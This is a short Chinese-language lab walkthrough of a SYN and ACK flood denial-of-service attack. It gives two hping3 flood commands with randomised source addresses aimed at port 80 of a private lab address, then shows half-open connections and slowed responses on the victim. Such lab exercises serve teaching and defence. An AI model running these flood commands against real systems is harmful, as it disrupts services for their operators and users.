DDOS ------直接攻击系统资源
思路:
攻击机利用三次握手机制,产生大量半连接,挤占受害者系统资源,使其无法正常提供服务。
1、先体验下受害者的正常网速。在受害者主机上执行以下命令
(1)开启Apache。
systemctl start apache2
(2) 下载百度首页代码。发现近乎瞬间完成。
curl baidu.com
2、在攻击机上执行以下代码,发起syn flood和ack flood。
bash
hping3 --flood --rand-source -S -p 80 192.168.237.133
hping3 --flood --rand-source -A -p 80 192.168.237.133
3、在受害机上观察
(1)输入netstat -ant,可以看到很多的半链接
(2)尝试再次请求百度首页代码。
curl baidu.com
发现系统资源被挤占,久久得不到回复。
